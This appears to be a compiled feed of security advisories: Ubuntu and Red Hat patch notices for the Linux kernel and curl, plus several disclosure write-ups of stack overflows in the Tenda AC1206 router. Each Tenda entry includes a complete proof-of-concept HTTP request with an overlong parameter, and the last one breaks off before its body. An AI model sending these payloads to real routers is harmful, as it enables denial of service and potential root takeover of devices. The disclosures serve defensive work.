Ubuntu Security Notice 5580-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5580-1August 24, 2022linux-aws vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systemsDetails:It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33655)It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33656)It was discovered that the Packet network protocol implementation in theLinux kernel contained an out-of-bounds access. A remote attacker could use this to expose sensitive information (kernel memory). (CVE-2022-20368)Domingo Dirutigliano and Nicola Guerrera discovered that the netfiltersubsystem in the Linux kernel did not properly handle rules that truncated packets below the packet header size. When such rules are in place, a remote attacker could possibly use this to cause a denial of service (system crash). (CVE-2022-36946)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   linux-image-4.4.0-1150-aws      4.4.0-1150.165   linux-image-aws                 4.4.0.1150.154After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5580-1   CVE-2021-33655, CVE-2021-33656, CVE-2022-20368, CVE-2022-36946

Ubuntu Security Notice USN-5580-1

Red Hat Security Advisory 2022-6157-01 - The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: curl security update  
Advisory ID:       RHSA-2022:6157-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6157  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-32206 CVE-2022-32207 CVE-2022-32208  
====================================================================  
1. Summary:

An update for curl is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The curl packages provide the libcurl library and the curl utility for  
downloading files from servers using various protocols, including HTTP,  
FTP, and LDAP.

Security Fix(es):

* curl: HTTP compression denial of service (CVE-2022-32206)

* curl: Unpreserved file permissions (CVE-2022-32207)

* curl: FTP-KRB bad message verification (CVE-2022-32208)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099300 - CVE-2022-32206 curl: HTTP compression denial of service  
2099305 - CVE-2022-32207 curl: Unpreserved file permissions  
2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
curl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
curl-debugsource-7.76.1-14.el9_0.5.aarch64.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-devel-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm

ppc64le:  
curl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-debugsource-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-devel-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm

s390x:  
curl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
curl-debugsource-7.76.1-14.el9_0.5.s390x.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-devel-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm

x86_64:  
curl-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
curl-debugsource-7.76.1-14.el9_0.5.i686.rpm  
curl-debugsource-7.76.1-14.el9_0.5.x86_64.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-devel-7.76.1-14.el9_0.5.i686.rpm  
libcurl-devel-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
curl-7.76.1-14.el9_0.5.src.rpm

aarch64:  
curl-7.76.1-14.el9_0.5.aarch64.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
curl-debugsource-7.76.1-14.el9_0.5.aarch64.rpm  
curl-minimal-7.76.1-14.el9_0.5.aarch64.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm

ppc64le:  
curl-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-debugsource-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-minimal-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm

s390x:  
curl-7.76.1-14.el9_0.5.s390x.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
curl-debugsource-7.76.1-14.el9_0.5.s390x.rpm  
curl-minimal-7.76.1-14.el9_0.5.s390x.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm

x86_64:  
curl-7.76.1-14.el9_0.5.x86_64.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
curl-debugsource-7.76.1-14.el9_0.5.i686.rpm  
curl-debugsource-7.76.1-14.el9_0.5.x86_64.rpm  
curl-minimal-7.76.1-14.el9_0.5.x86_64.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-7.76.1-14.el9_0.5.i686.rpm  
libcurl-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.i686.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32207  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwZpA9zjgjWX9erEAQjorQ/9G7KqpJrOkRXFM3iFlTVnUV/mGwdu4v5p  
dru+hce/7sEETk1Er9JXSBIZvtCk31V7QxswgIpgAwCBX/Ie/wr+tosF3jE+4YjL  
MCgtbk5Tzuak49Gsggz40GbvauEm3NiSyLPmG+A+tWrjqst3UWwobirEg7iVGUU1  
OOWKhNPzAr0iWoY1z2EBvBl23Fo8gaMYX9dd8dhcGza2OVMwzywrNW69h6bsQhDp  
Y5nAyBBCvwosqmDdIzZV5vDQEWoxb5uP+jnRgwtgJpaqdsn+ULkDuShIQZGntdA5  
fSCM57aSEmOY0bx/fE3/Z1b8Si3+GJ+j688rSlcRwlaA+Bxo5Az+PUbe4eWwTc2B  
vstfKWZHPLv/nyq+1JjV7/e+cuwAkn9YsT3/TUPlLtGjmg1x+4wytRXEF3uipFZR  
P5TJGLIlvaQbnpNfVfkxefCvvGRuomILaP12rRYuKuI1CR+jRLu3jEmFfoSyJs/q  
WR9OXuSQEFjTmLo3m8S7iRLN6bUWKItYhNmaSucZRgCvayT5BY54GbbssIAykQX8  
zLXIbqHQJec8sJuIdSwDSAuxyhrq30kSk0WLpfkK/uw179XpUphNK9CHL7VnGiVj  
haaef/yP7L12NBguJBmUnYWaWwa3sqepNQ3D8RQYXHrOmQ38VOjL76RQ0URYPkSB  
pl2iagecnP0=fQUi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6157-01

A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-22728

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the list parameter at the function formSetVirtualSer.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formSetVirtualSer function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formsetvirtualser function, str (the value of list) we entered will be passed into the save_virtualser_data function as a parameter, and this function has stack overflow.

In the save_virtualser_data function,the buf (the value of list) is formatted using the sscanf function and in the form of %[^,]%*c%[^,]%*c%[^,]%*c%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of lan_ip、 in_port 、out_port or protocol, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetVirtualServerCfg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,b,c,d~
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37798: vuln/Tenda/AC1206/5 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the time parameter at the function setSmartPowerManagement.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the setSmartPowerManagement function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the setSmartPowerManagement function,time(the value of time) we entered is formatted using the sscanf function and in the form of %[^:]:%[^-]-%[^:]:%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of hour_start、min_start、hour_end or min_end, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 12
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa-bbb:1
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37799: vuln/Tenda/AC1206/2 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the list parameter at the function fromSetRouteStatic.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromSetRouteStatic function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromSetRouteStatic function, list (the value of list) we entered will be passed into the save_staticroute_data function as a parameter, and this function has stack overflow.

In the save_staticroute_data function,the buf (the value of list) is formatted using the sscanf function and in the form of %[^,],%[^,],%[^,],%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of dst_net、 net_mask、 net_gw or net_ifname, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetStaticRouteCfg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,b,c,d~
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37800: vuln/Tenda/AC1206/7 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the list parameter at the function formSetQosBand.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formSetQosBand function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formSetQosBand function, list (the value of list) we entered will be passed into the setQosMiblist function as a parameter, and this function has stack overflow.

In the setQosMiblist function,the qos_str (the value of list) is formatted using the sscanf function and in the form of ;%[^;];%[^;];%[^;];%[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of limit_en、mac、 tmp_urate or tmp_drate, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetNetControlList HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    list=;a;b;c;dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd;
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37801: vuln/Tenda/AC1206/9 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the page parameter in the function fromNatStaticSetting.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromNatStaticSetting function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromNatStaticSetting function,the page we entered (the value of page) is formatted with the sprintf function, spliced with %s strings, and saved to gotopage. It is not secure, as long as the size of the data we enter is larger than the size of gotopage, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/NatStaticSetting HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37802: vuln/Tenda/AC1206/6 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the page parameter in the function fromAddressNat.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromAddressNat function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromAddressNat function,the page we entered (the value of page) is formatted with the sprintf function, spliced with %s strings, and saved to gotopage. It is not secure, as long as the size of the data we enter is larger than the size of gotopage, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/addressNat HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37803: vuln/Tenda/AC1206/8 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the time parameter in the function saveParentControlInfo.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the saveParentControlInfo function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the saveParentControlInfo function,time(the value of time) we entered is formatted using the sscanf function and in the form of %[^-]-%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of starttime or endtime, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 340
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
